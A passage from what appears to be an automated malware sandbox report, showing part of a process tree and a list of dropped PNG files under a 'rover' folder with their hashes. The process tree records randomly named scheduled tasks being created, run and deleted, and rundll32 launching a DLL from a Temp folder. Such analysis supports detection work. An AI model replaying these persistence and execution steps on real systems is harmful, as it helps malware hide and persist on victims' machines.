                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                PID:1184
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /run /I /tn "rrqYunoktxOQmCoCX"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5408
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:6084
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:2820
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\uavPNqcj\UYkvzfH.dll",#1 /jkididi 385118
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:1328
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\uavPNqcj\UYkvzfH.dll",#1 /jkididi 385118
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:5976
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:3532
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:3880
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                                                                                                            "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:736
                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:5116
                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff866a3ab58,0x7ff866a3ab68,0x7ff866a3ab78
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:896
                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1724 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:2
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:3344
                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:5996
                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1780 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:928
                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3076 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:5436
                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:4856
                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3844 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:4656
                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1736
                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:772
                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 --field-trial-handle=1944,i,2330779725670765738,13939663713792372992,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:1180
                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:3572

                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.001.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      8d0dfb878717f45062204acbf1a1f54c

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      1175501fc0448ad267b31a10792b2469574e6c4a

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      8cf6a20422a0f72bcb0556b3669207798d8f50ceec6b301b8f0f1278b8f481f9

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      e4f661ba8948471ffc9e14c18c6779dba3bd9dcc527d646d503c7d4bdff448b506a7746154380870262902f878275a8925bf6aa12a0b8c6eb8517f3a72405558

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.002.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      da104c1bbf61b5a31d566011f85ab03e

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      a05583d0f814685c4bb8bf16fd02449848efddc4

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      6b47ad7fe648620ea15b9c07e62880af48a504b83e8031b2521c25e508aa0ef1

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      a8e27abefb0f5bfffe15a19fd882b2e112687abe6ac4bbd5187036cb6058b0124d6ce76fc9227970c8fe2f5768aa0d1faa3319d33b1f42413e8bdfe2ce15296d

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.004.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      f57ff98d974bc6b6d0df56263af5ca0d

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      2786eb87cbe958495a0113f16f8c699935c74ef9

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      9508d82995364556a882c54306210e885868a8df2f2ad93485c14f88c9f9e1b7

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      1d4ca268d1c98ac545008b079076609e18bfdf22cd31b7b75b9218d03c6edb37b245298ff717e48309ca862f973a4383b101e43732a162b4d7f78573612c64ea

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.005.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      7fb2e99c5a3f7a30ba91cb156ccc19b7

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4b70de8bb59dca60fc006d90ae6d8c839eff7e6e

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      40436d5ab3589d33dae09b470ccacd369422d2569804cf1532e5946fc7e45535

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      c0d83325928d629abba648360c8687091d18d52991297d69625ccd4617d4d5add4aa16c288cc408b26c79cd37decf5ee2198e8b87b67ef5b88802afae93fb51a

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.006.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      a49c8996d20dfb273d03d2d37babd574

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      96a93fd5aa1d5438217f17bffbc26e668d28feaf

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      f4c568336894b3140f0ca7005a5751ad5a860422290b2b6e23d72656160862b1

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      9abb666891fa00ae77801fe9b3aab62bca37402197d22983e98d8442e6d890b1091a47dc1eca1ac68caa52a633bb60c8c3248de65056a6435f4affb98f401a30

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.007.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      e65884abe6126db5839d7677be462aba

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4f7057385928422dc8ec90c2fc3488201a0287a8

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      8956643da83aa74bc89b4d71db7b470200863de230be647a6881d8f3f60df3ac

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      7285b8acca0210a85dd4317a7beab161708544c4c25a742ce7284b545fa4953be89eb685e62f30fba56d6cb2fc806062ccdf4a0e62516eea047097c6856900c2

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.008.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      f355305ada3929ac1294e6c38048b133

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      a488065c32b92d9899b3125fb504d8a00d054e0e

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      37de9b0126ffa3967455083dd72ba70501b1e4c92ae25eb0667f840911585775

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      6082003d98022597007623ff7cdece9d9a14ad19bf55ac35afb2277fe22378c865899a5b28b4b5828d0d48fb7859fea82886d98d8d3a3813413f1e864e3849b2

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.009.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      1d812d808b4fd7ca678ea93e2b059e17

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      c02b194f69cead015d47c0bad243a4441ec6d2cd

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      e4e2fe6652557dec0e703da7325808cab4722961398dc9bf9fdae36c1de8841d

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      a8781c78d7d23f70f7450e749732d2909447cfa194d8e49a899c77f808e735878da8d838eecb4e8db7470d040800ae45f977d5f208bfad6c15d62d6456611e84

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.010.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      e0436699f1df69af9e24efb9092d60a9

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      d2c6eed1355a8428c5447fa2ecdd6a3067d6743e

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      eeae94fa4ddca88b0fefec2e449064ea1c6d4c8772762bb900dc7752b68706e4

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      d6b4adf98c9deb784be1f775a138a7252b558b9d9443a8a3d1435043196738b1ea32439cd09c507d0e2a074a5ba2973e7ffce6c41b26e17460b7695428666cbf

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.011.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      f45528dfb8759e78c4e933367c2e4ea8

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      836962ef96ed4597dbc6daa38042c2438305693a

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      31d92998e8e9de48700039027a935b5de3242afd4938e6b10509dc87d84eb758

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      16561ca527e2081519decbc0fb04b9955b398eb97db7a3d442500b6aefcb4e620bebd87d7c8ddad2cf940035710fc5a000b59d7ed5d0aa06f3af87e9eebcb523

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.012.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      195bb4fe6012b2d9e5f695269970fce5

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      a62ef137a9bc770e22de60a8f68b6cc9f36e343b

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      afa59cb80b91e29360a95746979be494bdee659d9b8bfad65782b474273d5e62

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      8fbe3ca2950261d976b80efd6a8d36d4a47b445a3e4669e100ce8c5d2a1f692e7b40ab324494a6de7847861d99194e13344a84aa135e458924b95fadf3905fd4

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.013.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      3c0ef957c7c8d205fca5dae28b9c7b10

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4b5927bf1cf8887956152665143f4589d0875d58

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      3e6a44a4e993d70a2f8409b4194fa15551d5f7a3651a5d1e74d3c6b640da08c7

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      bf2a5dd182c7cce4f6d00a4a1738f3a777b61c612c2449716b0fa62c62570ca1c21ac0063c221923e5db3b4101a4e7e32e711c9bfa075a2949ea9fa2e51ca704

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.014.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      2445d5c72c6344c48065349fa4e1218c

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      89df27d1b534eb47fae941773d8fce0e0ee1d036

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      694d6774638b36148f7a1b14809a025a16895ad4ec8645a6db2fe9cd5f784dbb

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      d8134a66845c71d633f56e5fd656d545f09dad82d18ec21a7415f825cb6c0634ed775008c6fdea83dfec95ce659144e6de806edac620f389fcc3064683c3a7b3

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.015.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      678d78316b7862a9102b9245b3f4a492

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      b272d1d005e06192de047a652d16efa845c7668c

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      26fab597e882c877562abea6b13557c60d3ed07fd359314cdc3a558f8224266b

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      cb6154e67ea75612dddd426e448f78c87946b123ff7b81f3fc83444adac4692bb5f3a04038291d9df7e102a301e41541a10e709e8adfde376016d86de15087db

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.016.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      aa4c8764a4b2a5c051e0d7009c1e7de3

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      5e67091400cba112ac13e3689e871e5ce7a134fe

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      1da7b39ec5f3cad19dc66f46fee90c22a5a023a541eca76325074bee5c5a7260

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      eea254f7327639999f68f4f67308f4251d900adb725f62c71c198d83b62aa3215f2ce23bd679fddde6ac0c40a5c7b6b04800bc069f2940e21e173b830d5762e2

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.017.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      7c216e06c4cb8d9e499b21b1a05c3e4a

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      d42dde78eb9548de2171978c525194f4fa2c413c

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      0083bb52df2830f2fc0e03ffa861728916e3f1a6db3560e66adbca9716318ee3

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      6ffbcc1c6ad1a0c01a35fdbf14918dfc9e2026a3021e3b6d761d56f4006b4218ffc2278eb2f820ae54722cd0c35fde40ca715154f6e2ae6c24aef0724d0ed004

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.018.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      e17061f9a7cb1006a02537a04178464d

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      810b350f495f82587134cdf16f2bd5caebc36cf5

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      9049038f58e048cc509bcc51434119465c376700ec45bedfd1d8f45440bdc32a

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      d5b899109a16195d3fdb8f23382b48bab70dfcd0c823a03a0cdc4e50501812fc644b938839c3346e8aabc2925ce3bdebffad07ef2f90d291663275ba3d225ab3

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.019.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      63dbf53411402e2a121c3822194a1347

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      86a2e77e667267791054021c459c1607c9b8dbb6

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      47b80b828244964005bd947b80958f3aa6372b843dc088e33fbbd35ab3f785c5

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      4b4603d88bddcb86e4282dafd55d8f00b852464daab588a554db829af566d5aa6baa3d575c58b133276be22203c014de73c0c3e35bfbe53570c356ef47bb5a50

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.001.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      0197012f782ed1195790f9bf0884ca0d

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      fc0115826fbaf8cefa478e506b46b7b66a804f13

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      c999fa6fd26a4a2af2155bd05522b44b54d6df90d1a9703a288bdf18b623c2cc

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      614bce1f761871ba1113de49217725b7b6661c703b03864cef736f44e2d1e0c5fbe133966d24afb15900f0e4da16b24000a2a638b6d7839848874f386b3b81c1

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.002.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      b45ff2750a41e0d8ca6a597fbcd41b57

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      cf162e0371a1a394803a1f3145d5e9b7cddd5088

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      727a2aac0697bcfecdc56dc4507516f9f64c5faa426f0ce69f7e607b74c4e1f4

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      82a9a3fc7dfae0ed6bf665c4f369f053af372551c1871d6b3dc775f447ba727e921ab831f8acd712cc31b66156eac643859404f05386e2592a15954fb78d87a3

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.003.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      95113a3147eeeb845523bdb4f6b211b8

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      f817f20af3b5168a61982554bf683f3be0648da1

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      800f0c501905bc4257415ee8bed738f897273600c721e80a15bcfbb2e2b3b847

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      4e55d9ced90f255b20890595f8e07ccaeedcbe08aed6303336eae7f66df1e50429259b62c556d5d8b179f7f9be22216c1592ba772e2cebd257b3401109f45cc4

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.004.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      8ce29c28d4d6bda14b90afb17a29a7f9

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      94a28ce125f63fcd5c7598f7cb9e183732ebdc16

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      eb9abbeddd27ce6fa82f1f7437309209450f9f8412eb395923a45d946d9c50b1

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      037babd109af1a2c05d7db87536bec41e3075d1120a37384d66f9460d8790be5732f8bbe6a2a13db3d017806fed88945f2a98697b586284b62760252276a8077

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.005.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      83ddcf0464fd3f42c5093c58beb8f941

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      e8516b6468a42a450235bcc7d895f80f4f1ca189

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      ebb3efda95b2d2588983742f96f51bdbcb9d87a6949f2c37ea11f509d236a536

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      51a6925bc9558f9ba232b85623d78f975d1c18c1990ce62153aa57a742e0897c72fc0665213024f8d5af96e56cc47eb384ee8d231910fdef876a0889b52a59d8

                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.006.png

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

